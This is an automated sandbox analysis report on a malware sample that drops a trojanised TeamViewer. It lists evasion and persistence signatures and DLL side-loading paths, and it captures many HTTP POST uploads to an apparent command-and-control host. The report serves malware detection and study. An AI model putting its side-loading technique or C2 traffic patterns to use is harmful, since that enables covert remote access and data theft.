Windows Analysis Report 77Etc0bR2v.bin

Overview

General Information

Sample Name:	77Etc0bR2v.bin (renamed file extension from bin to exe)
Analysis ID:	483795
MD5:	e71e3b995477081569ed357e4d403666
SHA1:	809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
SHA256:	94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
Tags:	exeHartexLLCsignedsoldewornek
Infos:
Most interesting Screenshot:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	17
Range:	0 - 100

Signatures

Multi AV Scanner detection for submitted file

Multi AV Scanner detection for dropped file

Tries to detect sandboxes and other dynamic analysis tools (window names)

Changes security center settings (notifications, updates, antivirus, firewall)

Creates processes via WMI

DLL side loading technique detected

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Contains functionality to detect sleep reduction / modifications

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Contains functionality to execute programs as a different user

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

EXE planting / hijacking vulnerabilities found

AV process strings found (often used to terminate AV products)

PE file does not import any functions

DLL planting / hijacking vulnerabilities found

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates or modifies windows services

Queries disk information (often used to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

May check if the current machine is a sandbox (GetTickCount - Sleep)

Contains functionality to delete services

Contains functionality to query network adapater information

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection:

Multi AV Scanner detection for submitted file

Source: 77Etc0bR2v.exe	Virustotal: Detection: 37%			Perma Link
Source: 77Etc0bR2v.exe	ReversingLabs: Detection: 37%

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll

ReversingLabs: Detection: 26%

Antivirus or Machine Learning detection for unpacked file

Source: 1.2.77Etc0bR2v.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen2

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0049B32E __EH_prolog3,CryptGenRandom,__CxxThrowException@8,	6_2_0049B32E
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,__CxxThrowException@8,	6_2_0049B4A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_006F605B CryptReleaseContext,	6_2_006F605B

Privilege Escalation:

EXE planting / hijacking vulnerabilities found

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

EXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Jump to behavior

DLL planting / hijacking vulnerabilities found

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SHFolder.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: VERSION.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: version.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: uxtheme.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: SHFOLDER.DLL	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: CLDAPI.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: winsta.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: msimg32.dll

Compliance:

Uses 32bit PE files

Source: 77Etc0bR2v.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

EXE planting / hijacking vulnerabilities found

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

EXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Jump to behavior

DLL planting / hijacking vulnerabilities found

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SHFolder.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: VERSION.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: version.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: uxtheme.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: SHFOLDER.DLL	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: CLDAPI.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: winsta.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: msimg32.dll

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.5:49752 version: TLS 1.2

PE / OLE file has a valid certificate

Source: 77Etc0bR2v.exe

Static PE information: certificate valid

Binary contains paths to debug symbols

Source:	Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source:	Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source:	Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.268193262.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.536045317.000000006EAFD000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.514763598.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.341816195.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.362277725.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345987825.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000002.367975860.000000006EAFD000.00000002.00020000.sdmp

Spreading:

Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_00405E61 FindFirstFileA,FindClose,	1_2_00405E61
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_0040263E FindFirstFileA,	1_2_0040263E
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_0040548B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,	3_2_6EAF28B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,	3_2_6EAF2DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,	6_2_004BF3A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,	6_2_0050331C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,	6_2_6EAF2DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,	6_2_6EAF28B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,	8_2_6EAF28B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,	8_2_6EAF2DF0

Networking:

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85134Content-Type: multipart/form-data; boundary=--------3509900953User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 86809Content-Type: multipart/form-data; boundary=--------4132168479User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 88912Content-Type: multipart/form-data; boundary=--------142932537User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84988Content-Type: multipart/form-data; boundary=--------175819007User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84980Content-Type: multipart/form-data; boundary=--------4273960975User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84976Content-Type: multipart/form-data; boundary=--------1234881971User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84926Content-Type: multipart/form-data; boundary=--------3962184161User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84962Content-Type: multipart/form-data; boundary=--------1422274513User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85001Content-Type: multipart/form-data; boundary=--------1112577220User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85017Content-Type: multipart/form-data; boundary=--------3839284298User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85026Content-Type: multipart/form-data; boundary=--------3697122959User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85132Content-Type: multipart/form-data; boundary=--------847302753User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85014Content-Type: multipart/form-data; boundary=--------4150287082User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85006Content-Type: multipart/form-data; boundary=--------2687879271User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84930Content-Type: multipart/form-data; boundary=--------1383517322User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84992Content-Type: multipart/form-data; boundary=--------2011772679User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84976Content-Type: multipart/form-data; boundary=--------1980331567User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84961Content-Type: multipart/form-data; boundary=--------2185878550User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84985Content-Type: multipart/form-data; boundary=--------3572611147User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84961Content-Type: multipart/form-data; boundary=--------2639774921User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84974Content-Type: multipart/form-data; boundary=--------428629968User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84984Content-Type: multipart/form-data; boundary=--------1864185560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84991Content-Type: multipart/form-data; boundary=--------1379028263User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84962Content-Type: multipart/form-data; boundary=--------2355185848User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85028Content-Type: multipart/form-data; boundary=--------1302388111User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84976Content-Type: multipart/form-data; boundary=--------1638634252User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85242Content-Type: multipart/form-data; boundary=--------3575858873User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84965Content-Type: multipart/form-data; boundary=--------285568995User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 88438Content-Type: multipart/form-data; boundary=--------2471988User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85028Content-Type: multipart/form-data; boundary=--------1216366252User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85015Content-Type: multipart/form-data; boundary=--------3636690275User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84958Content-Type: multipart/form-data; boundary=--------1861026164User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84979Content-Type: multipart/form-data; boundary=--------2060288736User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85018Content-Type: multipart/form-data; boundary=--------1941005641User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84997Content-Type: multipart/form-data; boundary=--------168896387User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84996Content-Type: multipart/form-data; boundary=--------2074872272User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85003Content-Type: multipart/form-data; boundary=--------1323967378User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84983Content-Type: multipart/form-data; boundary=--------29895310User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84996Content-Type: multipart/form-data; boundary=--------4240026889User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260701&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmRiamBoamBuTJKIemBMmoKGemDwysbMaMTEZsLKzMLGvmLIZshiyspkxsjGYG7Mwr5kanBybGRgbmRiTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=39260701&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260710&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAAiHrQD5CYOpp7/Zr7rEi/B/CnsUWehIzsjknPiOAQDnHgKBwxxFKCieiWhL1afx9eeCX4JSt5eDF8v1iZJ9o8IQAaQCrRik6ahUAKNkNBEdbLOE0i1SajuFK2r+FTuYEW7cUOxEu9d8mU9y6bkESGL5okL1ayDi3W7V7M1bCeZL HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=39260710&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260719&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAC+ETh/xoaDswnDrzpj2ezWmEgvX0+Ej1wtEYkKVyn+ydtvyFua/3Iri8RKmf9YcE9fPWO9gKA702VTWXdcuP9paHCFsUzDIqXKZ7SOAdSL0LmDI+BCYg1VARH3ovhl/wWKHhKvbobA55zrvFJv9j5s06datZSDN5Epd+G/FNL5V HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
